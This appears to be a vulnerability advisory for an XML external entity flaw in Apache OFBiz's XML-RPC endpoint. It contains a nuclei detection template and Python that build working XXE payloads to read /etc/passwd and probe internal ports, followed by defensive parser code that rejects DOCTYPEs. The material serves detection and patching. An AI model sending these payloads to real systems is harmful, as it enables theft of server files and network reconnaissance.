CVE-2011-3600: Apache OFBiz - XML External Entity Injection

Date: 2026-01-08 | Affected software: Apache OFBiz | PoC: public

Vulnerability description

The /webtools/control/xmlrpc endpoint of the OFBiz XML-RPC event handler is vulnerable to XML External Entity (XXE) injection. The request body is parsed with DOCTYPE processing enabled, so an unauthenticated attacker (CVSS PR:N) can declare an external entity, such as the file:////etc/passwd entity in the PoC below, and reference it inside the request. The PoC places the reference in <methodName>: no service has the expanded name, so the server answers with an XML-RPC fault whose faultString reflects the file contents back to the client. The same mechanism can be pointed at hosts and ports reachable from the server to probe for open network ports, and the returned error message reveals whether a given file exists. This affects OFBiz 16.11.01 to 16.11.04.
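As an added example, not part of the original advisory or of the nuclei template below, the following Python builds the same entity-injection body for the uses the description lists (file disclosure and port probing) and extracts faultString from an XML-RPC fault response to decide whether file contents were reflected, which is the decision the template's matcher makes. The transport is a pluggable callable so the module runs offline; the sample responses are constructed here, and the exact fault wording OFBiz returns is not taken from the page.

```python
import re
import xml.etree.ElementTree as ET
from typing import Callable, Dict, Optional

ENDPOINT = "/webtools/control/xmlrpc"
PASSWD_RE = re.compile(r"root:.*:0:0:")  # same marker the nuclei matcher uses


def build_payload(uri: str, entity: str = "disclose") -> str:
    """XML-RPC body with an external entity reference in <methodName>.

    No service has the expanded name, so the server answers with a fault
    whose faultString reflects the entity's expansion back to the client.
    """
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE x [<!ENTITY {entity} SYSTEM "{uri}">]>'
        f"<methodCall><methodName>&{entity};</methodName></methodCall>"
    )


def file_read_payload(path: str = "/etc/passwd") -> str:
    """Disclose a local file (the PoC writes file:////etc/passwd; three or
    four slashes resolve to the same path)."""
    return build_payload(f"file://{path}")


def port_probe_payload(host: str, port: int) -> str:
    """The parser must open a TCP connection to fetch this entity, so the
    fault text and response time differ between open and closed ports."""
    return build_payload(f"http://{host}:{port}/")


def extract_fault_string(body: str) -> Optional[str]:
    """Return faultString from an XML-RPC <methodResponse><fault>, or None."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    for member in root.iterfind("./fault/value/struct/member"):
        if member.findtext("name") == "faultString":
            value = member.find("value")
            # Either <value>text</value> or <value><string>text</string></value>
            return "".join(value.itertext()) if value is not None else None
    return None


def check_file_disclosure(body: str) -> Dict[str, object]:
    """A fault whose text contains a root passwd entry means the file was
    read by the server's parser and reflected to us."""
    fault = extract_fault_string(body)
    return {
        "fault_string": fault,
        "disclosed": bool(fault and PASSWD_RE.search(fault)),
    }


def probe(send: Callable[[str, str], str], path: str = "/etc/passwd") -> Dict[str, object]:
    """send(endpoint, body) -> response body. Inject a real HTTP client
    (hypothetical wrapper around requests.post) to run this against a lab host."""
    return check_file_disclosure(send(ENDPOINT, file_read_payload(path)))


# Constructed sample responses: wording is illustrative, not OFBiz's exact text.
SAMPLE_VULNERABLE = (
    '<?xml version="1.0"?>'
    "<methodResponse><fault><value><struct>"
    "<member><name>faultCode</name><value><int>0</int></value></member>"
    "<member><name>faultString</name><value><string>"
    "Could not find service root:x:0:0:root:/root:/bin/bash\n"
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</string></value></member>"
    "</struct></value></fault></methodResponse>"
)
SAMPLE_PATCHED = (
    '<?xml version="1.0"?>'
    "<methodResponse><fault><value><struct>"
    "<member><name>faultCode</name><value><int>0</int></value></member>"
    "<member><name>faultString</name><value><string>"
    "Failed to parse XML-RPC request: DOCTYPE is disallowed</string></value></member>"
    "</struct></value></fault></methodResponse>"
)

if __name__ == "__main__":
    # Offline run against the constructed responses
    print(probe(lambda _ep, _body: SAMPLE_VULNERABLE))
    print(probe(lambda _ep, _body: SAMPLE_PATCHED))
```

Requiring both a fault and the passwd marker, as the template does with its `and` condition, avoids a false positive from a page that merely echoes the request body back unparsed.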

PoC code [public]

id: CVE-2011-3600

info:
  name: Apache OFBiz - XML External Entity Injection
  author: daffainfo,pikpikcu
  severity: high
  description: |
    The /webtools/control/xmlrpc endpoint in the OFBiz XML-RPC event handler is exposed to External Entity Injection: DOCTYPE declarations carrying external entity payloads are processed, which discloses the contents of files on the filesystem. It can also be used to probe for open network ports, and to determine from returned error messages whether a file exists. This affects OFBiz 16.11.01 to 16.11.04.
  impact: |
    Attackers can disclose sensitive filesystem data, probe network ports, and determine file existence, leading to information disclosure and potential further exploitation.
  remediation: |
    Update to the latest OFBiz version or apply security patches addressing XML external entity vulnerabilities.
  reference:
    - https://lists.apache.org/thread/cwz2v0b6pnxvqrnsd0hj3l80g9qq5kd8
    - https://nvd.nist.gov/vuln/detail/CVE-2011-3600
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2011-3600
    cwe-id: CWE-611
    epss-score: 0.02132
    epss-percentile: 0.83708
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve,cve2011,apache,ofbiz,xxe,vuln,kev,vkev

http:
  - raw:
      - |
        POST /webtools/control/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file:////etc/passwd">]><methodCall><methodName>&disclose;</methodName></methodCall>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "faultString"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207c61b2e3f90b25b54a764834f5633c2e0af931fb1bcee2eaee09bff7b6a9b06f022100f089aa10be60bcc40f5019d085f02f6a06a1fec4517b3d0c47807506c78ed353:922c64590222798bb761d5b6d8e72950
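The remediation field above says to patch; the class of fix for CWE-611 is to stop the XML parser from processing DOCTYPE declarations at all. As an added example that is not OFBiz's code or patch, the following Python shows that check with the standard-library expat parser: it rejects any DOCTYPE or entity declaration as soon as the parser reports it, before any SYSTEM entity could be resolved, and only then reads the methodName. The PoC body is taken from the template above; the benign request is constructed here. The same pre-parse rejection can run in a reverse proxy in front of /webtools/control/xmlrpc as a compensating control while an upgrade is scheduled.

```python
import xml.parsers.expat


class XmlRpcRejected(ValueError):
    """Raised when a request body carries a DOCTYPE or entity declaration."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Fires at the start of <!DOCTYPE ...>, before the internal subset is read.
    raise XmlRpcRejected(f"DOCTYPE not allowed in XML-RPC request (root {name!r})")


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    # Defence in depth: no entity declaration of any kind is accepted.
    raise XmlRpcRejected(f"entity declaration not allowed: {name!r}")


def parse_method_name(body: bytes) -> str:
    """Parse an XML-RPC <methodCall> and return its methodName.

    Any DOCTYPE is refused the moment the parser sees it, so external
    (SYSTEM) entities are never fetched and internal-subset expansion
    bombs are refused as well.
    """
    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = _reject_doctype
    p.EntityDeclHandler = _reject_entity
    path, chunks = [], []

    def start(tag, attrs):
        path.append(tag)

    def end(tag):
        path.pop()

    def chars(data):
        # Collect text only for /methodCall/methodName
        if path == ["methodCall", "methodName"]:
            chunks.append(data)

    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = chars
    p.Parse(body, True)  # exceptions raised in handlers propagate from here
    if not chunks:
        raise XmlRpcRejected("no <methodCall><methodName> in request")
    return "".join(chunks).strip()


def accepts(body: bytes) -> bool:
    """True for a plain methodCall; False if rejected or malformed XML."""
    try:
        parse_method_name(body)
        return True
    except (XmlRpcRejected, xml.parsers.expat.ExpatError):
        return False


# The PoC body from the template above, and a constructed benign call.
POC_BODY = (
    b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file:////etc/passwd">]>'
    b"<methodCall><methodName>&disclose;</methodName></methodCall>"
)
BENIGN_BODY = b'<?xml version="1.0"?><methodCall><methodName>ping</methodName></methodCall>'

if __name__ == "__main__":
    print("benign:", accepts(BENIGN_BODY), parse_method_name(BENIGN_BODY))
    print("poc:", accepts(POC_BODY))
```

Rejecting the whole DOCTYPE, rather than only SYSTEM entities, is deliberate: an internal-subset entity with a large replacement text is a denial-of-service vector through the same parser, and no legitimate XML-RPC client sends a DTD.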

Related vulnerabilities